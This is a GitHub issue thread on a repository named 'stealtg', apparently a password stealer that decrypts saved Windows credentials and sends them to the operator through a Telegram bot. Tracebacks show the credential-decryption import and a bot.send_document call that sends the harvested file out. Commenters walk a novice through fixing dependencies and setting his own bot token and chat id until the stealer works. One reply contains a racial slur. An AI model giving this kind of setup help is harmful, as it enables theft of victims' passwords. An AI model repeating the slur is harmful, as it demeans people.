### ISSUE TITLE
password.py error

### ISSUE THREAD

**Issue by mrRaspberryJam** [pentestibman/stealtg#1]
Hi,
i had a problem when tried to start file.py. There is something with passwords.py. This error:
    File "E:\Python\111\stealtg-master\file.py", line 5, in <module>
        from hackpy.passwords import *
    File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\hackpy\passwords.py", line 4, in <module>
    from win32crypt import CryptUnprotectData
ModuleNotFoundError: No module named 'win32crypt'"

im using Windows 10 version 10.0.18363 if need it))

Wait for your answer
Thanks!

**Comment by Krypt00n-1337** [comment]
> Hi,
> i had a problem when tried to start file.py. There is something with passwords.py. This error:
> File "E:\Python\111\stealtg-master\file.py", line 5, in
> from hackpy.passwords import *
> File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\hackpy\passwords.py", line 4, in
> from win32crypt import CryptUnprotectData
> ModuleNotFoundError: No module named 'win32crypt'"
> 
> im using Windows 10 version 10.0.18363 if need it))
> 
> Wait for your answer
> Thanks!

Hi bro, please download python 3.7, and install module win32crypt, hackpy.

**Comment by LimerBoy** [comment]
Try: pip install pypiwin32

**Comment by mrRaspberryJam** [comment]
> Try: pip install pypiwin32

The comment above and you helped me but another errors appeared:

Traceback (most recent call last):
  File "E:\Python\111\stealtg-master\file.py", line 35, in <module>
    bot.send_document(adm, doc)
  File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\__init__.py", line 697, in send_document
    apihelper.send_data(self.token, chat_id, data, 'document', reply_to_message_id, reply_markup,
  File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\apihelper.py", line 529, in send_data
    return _make_request(token, method_url, params=payload, files=files, method='post')
  File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\apihelper.py", line 60, in _make_request
    return _check_result(method_name, result)['result']
  File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\apihelper.py", line 79, in _check_result
    raise ApiException(msg, method_name, result)
telebot.apihelper.ApiException: A request to the Telegram API was unsuccessful. The server returned HTTP 400 Bad Request. Response body:
[b'{"ok":false,"error_code":400,"description":"Bad Request: chat not found"}']

API problem? (sorry i`m newbie)

**Comment by Krypt00n-1337** [comment]
> > Try: pip install pypiwin32
> 
> The comment above and you helped me but another errors appeared:
> 
> Traceback (most recent call last):
> File "E:\Python\111\stealtg-master\file.py", line 35, in
> bot.send_document(adm, doc)
> File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot__init__.py", line 697, in send_document
> apihelper.send_data(self.token, chat_id, data, 'document', reply_to_message_id, reply_markup,
> File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\apihelper.py", line 529, in send_data
> return _make_request(token, method_url, params=payload, files=files, method='post')
> File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\apihelper.py", line 60, in _make_request
> return _check_result(method_name, result)['result']
> File "C:\Users\ivanl\AppData\Local\Programs\Python\Python38-32\lib\site-packages\telebot\apihelper.py", line 79, in _check_result
> raise ApiException(msg, method_name, result)
> telebot.apihelper.ApiException: A request to the Telegram API was unsuccessful. The server returned HTTP 400 Bad Request. Response body:
> [b'{"ok":false,"error_code":400,"description":"Bad Request: chat not found"}']
> 
> API problem? (sorry i`m newbie)
> 
> Wait for your answers
> Thanks

Oh, hell, did you install the telebot?

**Comment by mrRaspberryJam** [comment]
If you mean:
"pip install pytelegrambotapi"? 
Yep

**Comment by LimerBoy** [comment]
You need set you token and you chat id in file

**Comment by LimerBoy** [comment]
Replace token and adm to you info.

You must create bot in telegram and get you chatid

![photo](https://i.ibb.co/FnJKZs3/Screenshot-20200220-145901-Firefox.png)

**Comment by Krypt00n-1337** [comment]
> Replace token and adm to you info.
> 
> You must create bot in telegram and get you chatid
> 
> ![photo](https://camo.githubusercontent.com/bb7acfb8bb9517d20a7960bc4c1d845cc512b039/68747470733a2f2f692e6962622e636f2f466e4a4b5a73332f53637265656e73686f742d32303230303232302d3134353930312d46697265666f782e706e67)

Hello nigga

**Comment by mrRaspberryJam** [comment]
I`m feeling stupid. Mistake was in bad environment setting. Everything's work. Thanks to you all and sorry for time wasting )
